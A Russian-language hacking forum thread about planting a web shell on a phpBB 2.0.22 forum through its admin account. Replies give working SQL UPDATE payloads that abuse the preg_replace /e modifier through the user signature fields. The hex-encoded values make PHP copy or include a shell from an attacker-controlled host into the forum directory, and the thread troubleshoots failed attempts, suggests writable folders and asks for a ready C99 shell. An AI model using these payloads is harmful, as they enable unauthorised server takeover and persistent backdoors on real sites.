Форумы заливка shell - phpbb2

Здраствуйте! Версия форума 2.0.22 чистый (без модов). Что есть:
1. админский акуант (доступ в админку)
2. серверный путь к форуму
3. config.php
ftp доступа нету. =( БД не root.

Собственно вопрос... как загрузить shell ?

 

глянь
https://forum.antichat.ru/thread24488.html
и тут на ачате видео еще было по заливки шелла через бд

 

если file_priv=N
то никакое видео не поможет, и врятли что то можно сделать

 

несколько раз заливал через

но при этом у меня всегда был доступ к БД, через phpMyAdmin
насчет твоей версии незнаю

 

на форуме майскл имеет права file_priv=N

 

для того способа который я сказал file_priv не имеет значения

 

Да, сроботал. PHP Version показало.
мм.. может уже есть и готовый шелл под скрипт выше указаный? С99 хотелось бы...

 

в user_sig пропиши phpbb:copy("http://путь до шелла/шелл.txt","/путь до папки/куда лить/шелл.php")

 

Не дало востановить БД. Где-то ошибочку допустил.. подправте пожалуйста.

 

Code:

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=0x70687062623A636F70792822687474703A2F2F3139322E3136382E31302E352F64622E747874222C222F7661722F7777772F68746D6C2F666F72756D2F64622E7068702229 WHERE user_id=2;

не забудь пробелы убрать здесь:
F2F3 139322E3136382E31302E352F64622E747874222C222F76617 22F

 

Scipio я так понял тут привязка пошла к 192.168.10.5 ? Походу да.. не вышло. Возможно из-за того что 192.168.10.5 в другой под сети...
Если не трудно. то пожалуйста зделай под IP 10.0.0.5

 

Code:

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=0x70687062623A636F70792822687474703A2F2F31302E302E302E352F64622E747874222C222F7661722F7777772F68746D6C2F666F72756D2F64622E7068702229 WHERE user_id=2;

надеюсь на 10.0.0.5 поднят вебсервер?

 

Конечно, стоит апач с подержкой пхп.
Сообствено написало что БД успешно востановлена... но при входе в "профиль" просто пустая белая страница.
И при заходе на /forum/db.php

 

ну если все удачно прошло, то здесь /var/www/html/forum/ будет шелл с именем db.php

 

Scipio читай выше.. (я пост просто отредактировал). Что-то видать не верно..

 

прочитайте пост #3 три раза
одно дело ты записываешь функцию в базу, а другое записывать файл с помощью базы, если прав на работу с файлами нет, хоть об стенку бейся ни че не выйдет!

 

да причем здесь это, заливка происходит средствами php а не mysql

2number0, возможно нет прав на запись в эту папку, ищи папку где точно есть права на запись, например можно попробовать папку с аватарами, попробуй так:

Code:

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=0x70687062623A696E636C7564652022687474703A2F2F31302E302E302E352F64622E74787422 WHERE user_id=2;

это инклюд

 

Успешно БД востановило... профиль по прежнему пустой. Собственно что должно было выполнится?

 

должен был шелл http://10.0.0.5/db.txt проинклюдиться, db.txt- это точно полноценный вебшел?

 

Да полностью роботает, использовал его не на одном сайте.